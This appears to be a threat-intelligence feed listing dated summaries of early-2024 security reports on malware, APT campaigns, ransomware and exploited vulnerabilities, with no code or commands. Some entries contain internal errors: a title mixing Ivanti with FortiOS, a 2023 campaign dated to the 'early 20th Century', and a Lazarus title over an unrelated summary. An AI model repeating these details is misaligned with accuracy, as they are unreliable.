- Zscaler researchers have discovered that the threat actors responsible for the PikaBot malware have undergone a “devolution” in which they have made notable modifications to the virus. The developers have removed sophisticated obfuscation techniques and altered the network interactions, which has reduced the complexity of the code even though it looks to be in a new development cycle and testing phase.
Source:
https://www.zscaler.com/blogs/security-research/d-evolution-pikabot
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Warzone_RAT_Cybercriminals_caught
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- The article highlights an international operation that acquired domains involved in the sale of information-stealing malware. Federal authorities in Boston took control of www.warzone.ws and three associated domains, which were selling the sophisticated Warzone RAT malware. This Remote Access Trojan (RAT) allowed cybercriminals to access victims’ file systems, capture screenshots, record keystrokes, steal usernames and passwords, and even monitor victims through their web cameras, all without their awareness or consent.
Source:
https://www.malwarebytes.com/blog/news/2024/02/warzone-rat-infrastructure-seized
—
- Intel Source:
- Proofpoint
- Intel Name:
- Bumblebee_is_Back
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- On February 8, 2024, Proofpoint researchers have discovered that the Bumblebee malware had reappeared in the cybercriminal threat landscape following a four-month hiatus. Cybercriminal threat actors employ the sophisticated downloader known as Bumblebee, which was a preferred payload during its initial release in March 2022 and continued to be used until October 2023, when it vanished.
Source:
https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black
—
- Intel Source:
- Orange Cyberdefense
- Intel Name:
- Attackers_Exploiting_Ivanti_SSRF_Flow_to_Deploy_DSLog_Backdoor
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- In order to install the new DSLog backdoor on susceptible devices, hackers are taking use of a server-side request forgery (SSRF) weakness in the ZTA, Policy Secure, and Ivanti Connect Secure gateways. On Ivanti gateways running versions 9.x and 22.x, the vulnerability affects the SAML component of the aforementioned products and enables attackers to get around authentication and access resources that are blocked.
—
- Intel Source:
- Huntress
- Intel Name:
- MSSQL_Server_Compromise_and_Ransomware_Threat
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- Huntress researchers have unveils sophisticated tactics used by attackers targeting MSSQL servers, including the use of the bulk copy command for file extraction and the deployment of scripts for unauthorized account creation and remote access tool installation.
Source:
https://www.huntress.com/blog/attacking-mssql-servers
—
- Intel Source:
- SOCRadar
- Intel Name:
- LuaJIT_based_modular_backdoor_LuaDream_activity_by_Sandman_APT
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- SOCRadar wrote in their article that research provided by SentinelOne and QGroup, the Sandman APT group gained highly sophisticated and stealthy attack methods, with an accent focus on a new modular backdoor known as LuaDream, which is built on the LuaJIT platform. LuaDream’s strategy is targeted to minimize detection risks and showcases a continuous development approach.
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_Ivanti_critical_Remote_Code_Execution_vulnerability_in_FortiOS
- Date of Scan:
- 2024-02-12
- Impact:
- HIGH
- Summary:
- Fortinet has revealed a new critical Remote Code Execution vulnerability in FortiOS SSL VPN, cautioning about potential exploitation in ongoing attacks. Latest Ivanti Flaw Possibly Exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024).
—
- Intel Source:
- Habr
- Intel Name:
- Cyber_spies_Sticky_Werewolf_activity_in_Belarus
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- The cyberspyware APT group Sticky Werewolf probably tried to attack Belarusian companies by distributing the Ozone RAT remote access Trojan under the guise of computer cleaning and optimization software CCleaner.
Source:
https://habr.com/ru/companies/f_a_c_c_t/news/792672/
—
- Intel Source:
- Hunt.io
- Intel Name:
- Examination_of_new_ShadowPad_infrastructure_new_threat_actor
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- This post will examine ShadowPad infrastructure linked to a yet-to-be-identified threat actor. What makes this activity different is a slight change in the HTTP response headers and the use of a certificate attempting to spoof American technology company, Dell. Within this group of IPs, there are additional subsets of activity utilizing different port configurations and some interesting domains, discussed later in this article.
Source:
https://hunt.io/blog/tracking-shadowpad-infrastructure-via-non-standard-certificates
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Increased_delivery_of_the_DarkGate_loader
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- EclecticIQ analysts observed increased delivery of the DarkGate loader which was takedown of Qakbot infrastructure last year. EclecticIQ analysts are sure that financially motivated threat actors, including groups like TA577 and Ducktail, along with Ransomware-as-a-Service (RaaS) organizations such as BianLian and Black Basta, primarily use DarkGate. These threat actors target financial institutions in Europe and the USA, focusing mainly on double extortion tactics
Source:
https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_malicious_PowerShell_payload_Rabby_Wallet
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- ISC.Sans researcher Xavier Mertens in his research, YARA rule triggered a new sample called “Rabby-Wallet.msix”, the file has a VT score of 8/58. After his analysis, the file appears to implement the same technique to execute a malicious PowerShell payload.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_HijackLoader_Expands_Its_Evasion_Techniques
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers at CrowdStrike have discovered that, as other threat actors use the loader malware known as HijackLoader more frequently to deliver more payloads and tooling, the threat actors behind it have developed new security evasion strategies.
Source:
https://www.crowdstrike.com/blog/hijackloader-expands-techniques/
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_infections
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses the increasing prevalence of SolarMarker infections and the evolving tactics of the threat actor behind it. The eSentire Threat Response Unit (TRU) has been tracking SolarMarker since 2021 and has observed a significant increase in infections since November 2023. The threat actor has been using Inno Setup and PS2EXE tools to generate payloads, with recent payloads being modified using string replacements. The article also includes details on the PowerShell script used by SolarMarker, the loading of second-stage payloads, and the addition of junk instructions and byte arrays to evade detection. The TRU team recommends implementing controls such as Endpoint Detection and Response (EDR) solutions and security awareness training to protect against SolarMarker. The article also provides indicators of compromise and decrypted payloads for reference.
Source:
https://www.esentire.com/blog/the-oncoming-wave-of-solarmarker
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_Zardoor_backdoor_used_in_the_cyber_espionage_operation
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses a new cyber espionage campaign, known as Zardoor, targeting an Islamic non-profit organization. The campaign uses a previously unreported malware family and advanced techniques to maintain access to the victim’s network without detection. The article provides details on the execution flow of the Zardoor backdoor and how the threat actor maintains persistence using a dropper and malicious DLL files. It also describes the use of reverse proxy tools to bypass network security measures and provides information on how to detect and block this threat. The article concludes with a list of MITRE ATT&CK techniques used by the threat actor and a list of IOCs for further investigation.
Source:
https://blog.talosintelligence.com/new-zardoor-backdoor/
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_New_Rust_Written_MacOS_Backdoor_Ties_to_Windows_Ransomware
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers at Bitdefender have uncovered a brand-new backdoor that targets Mac OS users. This family of malware, which had not been previously described, is written in Rust and has a number of intriguing properties. All detected files are distributed directly as FAT binaries with Mach-O files for both x86_64 Intel and ARM architectures, and the backdoor appears to be posing as a Visual Studio update.
—
- Intel Source:
- Esentire
- Intel Name:
- The_injection_of_RemcosRAT_into_the_winhlp32_exe_file_process
- Date of Scan:
- 2024-02-09
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent threat investigation conducted by eSentire’s Threat Response Unit (TRU). The investigation involved a suspicious ZIP archive containing an AnyDesk executable and a VBS file, delivered via a Discord CDN link. Further investigation revealed that the VBS file executed another VBS file hosted on paste[.]ee, which contained the DcRat malware. The DcRat malware had encrypted configuration and supported dynamic loading and execution of plugins. The final payload retrieved via the plugin was a VBS file containing the RemcosRAT malware and dynwrapx.dll. The RemcosRAT malware was injected into the winhlp32.exe process and allowed for remote control of the infected machine. The TRU team isolated the system and provided recommendations for protection against similar threats, such as user training and using Next-Gen AV or Endpoint Detection and Response tools. The section also includes indicators of compromise and references for further information.
Source:
https://www.esentire.com/blog/from-onlydcratfans-to-remcosrat
—
- Intel Source:
- ArcticWolf
- Intel Name:
- Exploitation_of_Confluence_Server_Vulnerability_CVE_2023_22527
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers from Arctic Wolf have seen proof of the C3RB3R ransomware and a number of other malicious payloads being used after the CVE-2023-22527 vulnerability was exploited. CVE-2023-22527 is being used by a number of threat actors to distribute payloads for trojans that gain remote access and mine cryptocurrencies.
—
- Intel Source:
- Fortinet
- Intel Name:
- Attacks_on_Critical_Infrastructure_Exploiting_FortiOS_Vulnerabilities
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers from Fortinet alerted companies on Wednesday that attacks targeting vital infrastructure and other sectors have been made possible by APTs associated with China and other nations, which have been taking use of two known FortiOS vulnerabilities.
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_malicious_use_of_maldocs
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses the use of maldocs, or malicious documents, in spreading malware. It introduces the concept of maldocs and provides examples of different types of malware. The article also focuses on old and well-known CVEs used in Microsoft Word and Excel, and their continued threat to the cyber community. It discusses the techniques used by maldoc operators to evade detection and the challenges faced by researchers in analyzing them. The article concludes by emphasizing the need for different methods to deal with maldocs and providing resources for further reading.
Source:
https://research.checkpoint.com/2024/maldocs-of-word-and-excel-vigor-of-the-ages/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Raspberry_Robin_worm
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses the latest version of the malware Raspberry Robin and its evasion techniques, including NtTraceEvent hooking and new evasion tricks. It also explains the changes in the malware’s lateral movement logic and communication method. The article provides a comparison between the previous and current versions of the malware and describes its persistence method. It also discusses the ongoing threat of Raspberry Robin and how Check Point customers remain protected against it. The article includes a detailed analysis of the first stage of the malware and its use of APIs. It also provides a list of IOCs and onion domains associated with the malware.
Source:
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
—
- Intel Source:
- Avast
- Intel Name:
- Avast_Q4_2023_Threat_Report
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The Avast Q4/2023 Threat Report provides a comprehensive overview of the cyber threat landscape in the fourth quarter of 2023. It covers both desktop and mobile threats, highlighting the significant increase in blocked attacks and the resurgence of Qakbot. The report also discusses the use of Google OAuth API for malicious activities and the rise of malicious coinmining. It also covers the evolving mobile threat landscape, including the resurgence of the Chameleon banker and the spread of SpyLoans on the PlayStore. The report concludes with predictions for 2024 and emphasizes Avast’s commitment to ensuring the safety of its users. The methodology used in the report is also explained, including the calculation of the “risk ratio” to measure the severity of specific threats. The report also discusses the prevalence and impact of RATs, rootkits, and web-based threats on mobile devices. It also covers the growing trend of mobile scams and the use of cell phones for online presence management. The report also highlights the dangers of adware and the need for dynamic and adaptive measures to counter it. It also discusses the prevalence of financial and dating scams, as well as the increase in fake online shops and phishing scams targeting post-holiday online shoppers. The report also mentions the use of standard tools and vulnerabilities by rootkits and APT groups, as well as Avast’s efforts to address scam push notifications. It also discusses the distribution of malicious mods for popular messaging apps and the risk ratio for mobile spyware. The report also provides insights into the prevalence and impact of bots and coinminers, with a focus on specific threats and countries. Overall, the report highlights the constantly evolving and sophisticated nature of cyber threats and the need for increased cybersecurity measures to protect against them.
Source:
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_PAPERWALL_malicious_campaign
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses the PAPERWALL network, a large and fast-growing network of Chinese websites posing as local news outlets. It provides information on the number of websites targeting various countries and the high-confidence host IP addresses. The article also discusses the attribution of PAPERWALL to a Chinese PR firm and the evidence linking it to the websites. It also mentions the use of hypestat.com to measure website traffic and the negligible traffic for most PAPERWALL domains. The article highlights the network’s tactics, including the use of commercial press releases to disseminate pro-Beijing disinformation and ad hominem attacks. It also discusses the potential impact of these influence operations and the role of private firms in managing them. The article provides a breakdown of the types of content published on the PAPERWALL websites, including conspiracy theories, Chinese state media reposts, and scraping of local mainstream media. It also discusses the infrastructure and hosting of these websites, as well as the small number of content author names used. The article concludes by listing the confirmed domains and targeted countries, as well as acknowledging the research support and peer review from various individuals and organizations.
—
- Intel Source:
- S2W Blog
- Intel Name:
- The_Golang_Stealer_Troll_and_GoBear_Backdoor
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- S2W threat researchers have discovered a new malware sample associated with the Kimsuky group, named Troll Stealer. It is distributed through a Dropper disguised as SGA Solutions’ Trusted PKI installer. Troll Stealer is capable of Stealing the GPKI folder on infected systems, indicating a potential focus on devices within administrative and public organizations in South Korea. Furthermore, the identification of additional malware signed with the same legitimate certificate raises the possibility of future distributions using that certificate.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Malicious_Python_Scripts_Targeting_Windows_Users
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have identified a threat where malicious Python scripts are employed by threat actors to target Windows users, incorporating a keylogger. The recorded keystrokes are transmitted to a basic TCP connection established with the command and control server (C2), lacking any form of encryption, essentially sending raw keycodes.
—
- Intel Source:
- Cyble
- Intel Name:
- The_analysis_of_a_new_Clipper_dubbed_XPhase
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses a new malware campaign, known as the “Doppelganger Dilemma,” which targets cryptocurrency users through deceptive websites and mimicking legitimate crypto applications. The campaign primarily targets Indian users but also has phishing sites tailored to Russian users. The malware, named “XPhase Clipper,” intercepts and modifies cryptocurrency wallet addresses copied by users. The campaign is linked to a previous phishing campaign and is believed to be carried out by the same threat actor. The article also highlights the use of a deceptive YouTube channel and provides technical analysis of the campaign. The abstract introduces the concept of adaptability and resourcefulness in sustaining cyber attacks, and the article concludes with recommendations for cybersecurity best practices and indicators of compromise for detecting the XPhase Clipper malware.
—
- Intel Source:
- Lumen
- Intel Name:
- Its_Not_A_Comeback_of_KV_Botnet
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- According to Black Lotus Labs, since users are unlikely to notice an impact or possess the required monitoring forensic tools to detect an infection, KV-botnet attackers will likely continue to use medium- to high-bandwidth devices as a springboard in the geographic areas of their targets. Additionally, the Federal Bureau of Investigation (FBI) carried out a court-authorized takedown of the KV-botnet in early December 2023, according to a press release from the Department of Justice (DOJ).
—
- Intel Source:
- Securelist
- Intel Name:
- Abuse_of_Squirrel_Installation_by_Multi_Stage_Banking_Trojan
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- Securelist researchers have discovered a new malware that is targeting consumers of over 60 banking institutions, primarily in Brazil. Using a variety of cutting-edge technologies, it differs from well-known banking Trojan attacks.
Source:
https://securelist.com/coyote-multi-stage-banking-trojan/111846/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- A_malvertising_campaign_on_Facebook_still_on
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses a Facebook scam that has been ongoing for almost a year and is now appearing in different languages. The scam involves fake posts about fatal accidents and prompts users to click on a link, leading to malicious websites. The scammers use different tactics to target users based on their location and device. Tips on how to protect oneself from falling victim to this scam are provided, such as checking for unknown apps and enabling two-factor authentication. Malwarebytes’ efforts to block these malicious websites are also mentioned, along with their Identity Theft Protection service as a way to safeguard personal information.
Source:
https://www.malwarebytes.com/blog/news/2024/02/facebook-fatal-accident-scam-still-rages-on
—
- Intel Source:
- ASEC
- Intel Name:
- BlueShell_Targeting_Linux_Systems_in_Korean_Attacks
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified ongoing attacks on Korean Linux systems, where the BlueShell backdoor malware, upon installation, grants the threat actor full control over the compromised system.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Distribution_of_Zephyr_CoinMiner
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The ASEC BLOG has discovered a CoinMiner targeting Zephyr cryptocurrency, distributed through a compressed file named “WINDOWS_PY_M3U_EXPLOIT_2024.7z.” The file creates scripts and executables, including an NSIS installer and two Javascript files, executed via wscript.exe. The executable “x.exe” contains a compressed file and a legitimate “7za.exe” file, which, when decompressed with a specific password, creates two more Autoit script files acting as a CoinMiner. Users are advised to be cautious when downloading files from unknown sources and to update their anti-malware solutions. The malware is detected by V3 and IOC information is provided for further investigation.
—
- Intel Source:
- Vice
- Intel Name:
- The_fake_version_of_WhatsApp_linked_to_a_spyware
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- Researchers have discovered a fake version of WhatsApp created by a spyware vendor, Cy4Gate, to gather information from iPhone users. The fake app was designed to trick users into installing a configuration file that could potentially collect data from their device. The company has a history of developing surveillance products and the fake WhatsApp page shared an encryption certificate with other domains associated with Cy4Gate. Although the company denied involvement, the researchers believe it is likely their product. The article also discusses Cy4Gate’s Epeius product, which is designed for targeted surveillance and data collection.
—
- Intel Source:
- CISA
- Intel Name:
- The_compromise_of_the_IT_environments_of_multiple_critical_infrastructures_by_Volt_Typhoon
- Date of Scan:
- 2024-02-07
- Impact:
- HIGH
- Summary:
- The CISA, NSA, and FBI released a joint Cybersecurity Advisory about People’s Republic of China (PRC) state-sponsored cyber actors who are trying to disrupts on IT networks with cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. It was based on observations from the U.S. authoring agencies’ incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors—in the continental and non-continental United States and its territories, including Guam.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories?f%5B0%5D=advisory_type%3A65&f%5B1%5D=advisory_type%3A93&f%5B2%5D=advisory_type%3A94
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
https://www.cisa.gov/news-events/analysis-reports/ar24-038a
—
- Intel Source:
- F1tym1
- Intel Name:
- The_distribution_of_Qshing_Emails
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses the distribution of Qshing emails, which are disguised as payslips and lead to malicious apps or phishing sites when a QR code is scanned. The sender email address is forged to appear legitimate, but the actual address can be seen in the email header. Scanning the QR code redirects users to a phishing site that prompts for personal information and can result in financial losses. The article provides IOC information and encourages users to subscribe to AhnLab’s threat intelligence platform for more information.
Source:
https://f1tym1.com/2024/02/02/distribution-of-qshing-emails-disguised-as-payslips/
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_phishing_campaign_disguised_as_a_famous_Korean_portal_login_page
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses a recent phishing case where a fake login page was disguised as a popular Korean portal website. The threat actor collected login credentials and client information through the phishing page and used a legitimate plugin-type service to obtain more data. The article provides IOC information and advises caution when using login pages linked to emails from unknown sources.
—
- Intel Source:
- Rapid7
- Intel Name:
- A_Comprehensive_Analysis_of_Black_Hunt_Ransomware
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article provides a comprehensive analysis of the Black Hunt ransomware, a new variant that was first reported in 2022. The article discusses the ransomware’s features and capabilities, including its ability to encrypt various file extensions and evade detection by checking for debugging and targeting specific countries. It also explores the ransomware’s code and functionality, including its encryption process, spreading mechanisms, and use of MITRE ATT&CK techniques. The article also provides an overview of the ransomware’s malicious activities, such as modifying the Windows registry, disabling security measures, and inhibiting system recovery. It concludes with a list of indicators of compromise and a technical analysis of the ransomware’s code.
—
- Intel Source:
- Splunk
- Intel Name:
- Jenkins_CVE_2024_23897_RCE
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- This article discusses the recent discovery of a critical security vulnerability in Jenkins servers, which are commonly used for continuous integration and deployment in software development. The vulnerability, known as CVE-2024-23897, allows attackers to read files from the server’s file system without authentication. The Splunk Threat Research Team has developed security analytics and hunting queries to help defenders protect against this exploit. The article provides an overview of the exploit and how it works, as well as a sample query for detecting it in Jenkins logs. It also discusses the use of a reverse proxy and logging Jenkins logs in Splunk for enhanced security. The author, Michael Haag, is also mentioned, along with references for further information.
Source:
https://www.splunk.com/en_us/blog/security/security-insights-jenkins-cve-2024-23897-rce.html
—
- Intel Source:
- Infoblox
- Intel Name:
- Lazarus_KandyKorn_malicious_DNS
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses the importance of early detection of malicious domains in preventing cyber attacks. It introduces Infoblox’s DNS Early Detection Program, which uses proprietary techniques to identify potentially malicious domains and compares its analysis with data from public open source intelligence and commercial threat intelligence feeds. The program’s findings and role in identifying suspicious domains are highlighted, along with an analysis of a phishing campaign by CSIRT KNF. The methodology used in the analysis and the advantages of using Infoblox’s suspicious domain data are also discussed. The article is written by a senior product marketing manager at Infoblox with experience in cybersecurity.
—
- Intel Source:
- MP.WEIXIN.QQ
- Intel Name:
- Kimsuky_APT_Evolving_Tactics_targeted_Cyber_Espionage_Campaign
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Kimsuky APT, known for targeting South Korean military, expands cyber espionage to government entities. Recent tactics involve deceptive LNK files, with a focus on the financial sector. The group employs advanced techniques, including cloud services for communication, indicating an evolving threat landscape. Cybersecurity vigilance is crucial in countering Kimsuky’s sophisticated and fileless attacks.
—
- Intel Source:
- Cybereason
- Intel Name:
- The_Second_Round_of_Ivanti_Connect_Secure_VPN_ZeroDay_Exploitation
- Date of Scan:
- 2024-02-06
- Impact:
- HIGH
- Summary:
- Researchers from Cybereason have looked into instances when Ivanti VPN appliances’ recently discovered vulnerabilities known as zero-days were exploited. These vulnerabilities were not patched at the time of disclosure. Ivanti urged users to implement quick mitigations for two significant vulnerabilities impacting their Connect Secure and Policy Secure systems, which were identified as CVE-2023-46805 and CVE-2024-21887, on January 10, 2024. A third party published a Proof of Concept (PoC) on January 16, 2024, which led to an increase in the scope of exploitation. In addition to the existing threat, Ivanti disclosed two additional vulnerabilities on January 31st: CVE-2024-21888, which is a privilege escalation flaw, and CVE-2024-21893, which is an SSRF web vulnerability. These vulnerabilities increase the need for action and increased security awareness while the manufacturer continues to work on developing and delivering suitable mitigations.
Source:
https://www.cybereason.com/blog/threat-alert-ivanti-connect-secure-vpn-zero-day-exploitation
—
- Intel Source:
- SeeBug
- Intel Name:
- New_Trojan_Tools_Used_by_APT_K_47_Group
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from SeeBug have discovered that the APT-K-47 group used an undisclosed Trojan tool. Following a successful intrusion, the tool downloads additional malicious payloads and ORPCBackdoor, traverses disk directories to steal target files, and then sends the data back to the command and control server (C2). Simultaneously, the group transmitted the password information back after stealing it from the target computer’s browser.
Source:
https://paper.seebug.org/3115/
—
- Intel Source:
- GROUP-IB
- Intel Name:
- APAC_Job_Seekers_Data_Compromised_In_Massive_Breach
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- GROUP-IB researchers have discovered that ResumeLooters successfully targeted a minimum of 65 websites in 2023, using straightforward techniques such as SQL injection and XSS. The threat actor sought to insert XSS scripts into all accessible forms, with the intention of executing them on administrators’ devices to acquire admin credentials.
—
- Intel Source:
- QiAnXin X Laboratory
- Intel Name:
- C2_Hosting_Using_EtherHiding_by_SmartGaft
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from XLab have obtained Smargaft bot samples for two different versions of each of the three CPU architectures: ARM, MIPS, and X86/64. The ability of these versions to spread like worms is the main distinction between them. In general, Smargaft functions quite simply. It verifies the current user when it runs on a compromised device; if it’s root, it starts more scanning and propagation tasks. After that, it manipulates the watchdog to stop the device from restarting and binds to a local port to guarantee that only one instance is running at a time. It then initiates five actions, including as using smart contracts to obtain C2, launching DDoS attakcs, and making sure it stays on the device. Lastly, Smargaft cycles through these duties at predetermined intervals while operating in an endless loop.
Source:
https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/
—
- Intel Source:
- CSIRT-CTI
- Intel Name:
- Stately_Taurus_Cyber_Espionage_in_Myanmar
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Between November 2023 and January 2024, cybersecurity teams uncovered a series of cyber attacks by Stately Taurus targeting Myanmar’s military entities. The campaigns involved sophisticated malware delivery through phishing, using tactics like DLL hijacking and Cobalt Strike beacons. These efforts aimed at espionage against the Myanmar military, leveraging political tensions as bait for their attacks. The operation’s complexity and targeted nature highlight the ongoing cyber threats from state-sponsored actors in the region.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Public_Information_and_Spam_Email
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Multiple organizations make their contact details available to the public so that people can ask for assistance when they need it. This could be a list of all staff members’ public contacts or just general information. It should go without saying that having any information that is accessible to the public will make these accounts more vulnerable to spam or phishing emails.
Source:
https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- Alleged_Medibank_Hacker_Aleksandr_Ermakov
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- The article discusses the recent financial sanctions imposed on Russian man Aleksandr Ermakov for his alleged involvement in the hacking of Australian health insurance company Medibank. Ermakov is believed to have worked with the ransomware group REvil and is accused of stealing and leaking sensitive data of 10 million customers. The section provides information on Ermakov’s aliases, his connection to REvil, and his involvement in other cybercrime activities. It also mentions his affiliation with a Russian technology firm and his connection to a cybercriminal known as “Rescator.” The article also discusses the potential impact of the sanctions on Ermakov’s life and the challenges he may face in Russia as a result.
Source:
https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_distribution_of_Python_Info_stealer
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- In January 2024, FortiGuard Labs obtained an Excel document distributing an info-stealer related to a Vietnamese group first reported in August 2023. The attack uses simple downloaders to increase detection difficulty. The info-stealer collects browsers’ cookies and login data, compresses it, and sends it to the attacker’s telegram bot.
Source:
https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
—
- Intel Source:
- BI.ZONE
- Intel Name:
- Scaly_Wolf_Attacks_Russian_Business_With_White_Snake_Stealer
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from BI.ZONE have connected the Scaly Wolf organization to at least ten campaigns. Russian companies across a range of industries, including manufacturing and logistics, faced attacks. One of the group’s quirks is that they send phishing emails pretending to be Russian government agencies in order to obtain first access. The requirements of Roskomnadzor, the Russian Federation’s Investigative Committee, and the Military Prosecutor’s Office of the Russian Federation are among the tools in the criminals’ phishing armory. Attackers occasionally pose as commercial offers in emails.
—
- Intel Source:
- Cado Security
- Intel Name:
- Examining_New_Malware_Operation_Aimed_Against_Docker
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers at Cado have discovered the commando cat malware campaign, which targets Docker API endpoints exposed to the public. Since the start of 2024, there have been two campaigns that have targeted Docker. The first was the malicious deployment of the 9hits traffic exchange application, the results of which were reported just a few weeks ago.
—
- Intel Source:
- Any.Run
- Intel Name:
- CrackedCantil_malware
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- AnyRun researchers dive into a recent case of something they call a “malware symphony.” It’s a way to describe how different types of malware can work together, sort of like instruments in an orchestra.
Source:
https://any.run/cybersecurity-blog/crackedcantil-breakdown/
—
- Intel Source:
- Harfanglab
- Intel Name:
- The_exploitation_of_compromised_routers_to_target_goverment_in_Europe_and_Caucasus
- Date of Scan:
- 2024-02-05
- Impact:
- MEDIUM
- Summary:
- A look back at a malicious espionage campaign that targeted government organisations in Ukraine and Poland in the early 20th Century and may have been carried out by a threat-actor known as APT28. HarfangLab identified additional malicious files and infrastructure which they believe with high confidence are part of the same campaign. The campaign targeted government organisations in Ukraine and Poland at least (and possibly in Azerbaijan as well), started on 2023-12-13 at the latest, and abused legitimate Ubiquity network devices as infrastructure. HarfangLab could not reliably link the described campaign with APT28 in particular.
Source:
https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/
—
- Intel Source:
- Sentilone
- Intel Name:
- A_malware_campaign_infecting_cracked_macOS_apps
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers discovered a malware campaign infecting cracked macOS apps from torrent sites to install a backdoor for further malware delivery. The malware disables security settings and then uses Python scripts to achieve persistence and retrieve additional payloads.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Examining_the_Newest_Stealer_Variant_of_Mispadu
- Date of Scan:
- 2024-02-05
- Impact:
- LOW
- Summary:
- Researchers from Unit 42 have recently found activities linked to the covert infostealer known as Mispadu Stealer, who was first identified in 2019. In their search for ways to exploit the CVE-2023-36025 vulnerability in this instance, they came upon a family of infostealer malware that targets particular areas and URLs that are frequently connected to Mexican nationals.
Source:
https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/
—
- Intel Source:
- Akamai
- Intel Name:
- FritzFrog_Botnet_Currently_Using_Log4Shell_Bug
- Date of Scan:
- 2024-02-05
- Impact:
- MEDIUM
- Summary:
- Akamai researchers have provided an explanation for the change in the FritzFrog botnet, which has been in existence since 2020. Typically, the botnet leverages brute-force attacks to breach SSH, a network connection protocol, in order to access servers and launch cryptominers. However, more recent versions now scan many system files on infected computers to identify targets that are very likely to be weak points for this attack.
Source:
